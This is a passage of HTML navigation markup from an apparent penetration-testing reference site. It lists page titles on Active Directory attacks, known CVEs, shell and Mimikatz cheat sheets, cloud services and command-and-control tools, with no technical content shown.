</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-delegation-unconstrained/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos Delegation - Unconstrained Delegation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-s4u/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos - Service for User Extension
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-tickets/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos - Tickets
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-comments/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - AD User Comment
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-dsrm-credentials/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - DSRM Credentials
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-group-policy-preferences/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - Group Policy Preferences
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-precreated-computer/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - Pre-Created Computer Account
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-read-gmsa/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - GMSA
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-read-laps/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - LAPS
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-shadow-credentials/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - Shadow Credentials
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../pwd-spraying/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Password - Spraying
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../trust-pam/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Trust - Privileged Access Management
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../trust-relationship/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Trust - Relationship
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../trust-sid-hijacking/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Child Domain to Forest Compromise - SID Hijacking
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../trust-ticket/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Forest to Forest Compromise - Trust Ticket
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_44" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_2_44" id="__nav_2_44_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
CVE
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_44_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_2_44">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
CVE
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../CVE/MS14-068/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
MS14-068 Checksum Validation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../CVE/NoPAC/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
NoPAC / samAccountName Spoofing
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../CVE/PrintNightmare/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
PrintNightmare
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../CVE/PrivExchange/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
PrivExchange
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../CVE/ZeroLogon/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
ZeroLogon
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Cheatsheets
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_3">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Cheatsheets
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/escape-breakout/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kiosk Escape and Jail Breakout
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/hash-cracking/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Hash Cracking
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/mimikatz-cheatsheet/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Mimikatz
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/miscellaneous-tricks/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Miscellaneous & Tricks
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/network-discovery/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Network Discovery
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/powershell-cheatsheet/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Powershell
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/shell-bind-cheatsheet/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Bind Shell
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/shell-reverse-cheatsheet/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Reverse Shell Cheat Sheet
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cheatsheets/source-code-management-ci/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Source Code Management & CI/CD Compromise
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Cloud
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_4">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Cloud
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_1" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_4_1" id="__nav_4_1_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Aws
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_1_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_4_1">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Aws
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-access-token/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Access Token & Secrets
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-cli/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - CLI
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-cognito/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - Cognito
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-dynamodb/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - DynamoDB
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-ec2/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - EC2
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-enumeration/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Enumerate
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-iam/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Identity & Access Management
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-ioc-detection/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - IOC & Detections
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-lambda/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - Lambda & API Gateway
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-metadata/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Metadata SSRF
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-s3-bucket/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - S3 Buckets
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-ssm/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Service - SSM
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/aws/aws-training/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
AWS - Training
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_4_2">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Azure
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/aka-ms/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
aka.ms Shortcuts
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-access-and-token/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - Access and Tokens
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-ad-conditional-access-policy/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - Conditional Access Policy
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-ad-connect/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - AD Connect and Cloud Sync
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-devices-users-sp/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - IAM
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-enumeration/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - Enumerate
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-persistence/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - Persistence
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-phishing/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure AD - Phishing
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-requirements/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure - Requirements
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-application-endpoint/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Application Endpoint
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-application-proxy/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Application Proxy
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-container-registry/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Container Registry
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-deployment-template/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Deployment Template
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-devops/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Azure DevOps
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-keyvault/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - KeyVault
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-microsoft-intune/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Microsoft Intune
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-office-365/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Office 365
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-runbook/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Runbook and Automation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-storage-blob/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Storage Blob
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-virtual-machine/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Virtual Machine
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-web-apps/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - Web Apps
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/azure/azure-services-web-domains/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Azure Services - DNS Suffix
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Ibm
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_4_3">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Ibm
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/ibm/ibm-cloud-databases/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
IBM Cloud Managed Database Services
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../cloud/ibm/ibm-cloud-object-storage/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
IBM Cloud Object Storage
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Command control
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
|
|
<label class="md-nav__title" for="__nav_5">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Command control
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../command-control/cobalt-strike-beacons/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Cobalt Strike - Beacons
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../command-control/cobalt-strike-kits/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Cobalt Strike - Kits
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../command-control/cobalt-strike/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Cobalt Strike
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../../command-control/metasploit/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Metasploit
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
</ul>
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Containers
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
|
|
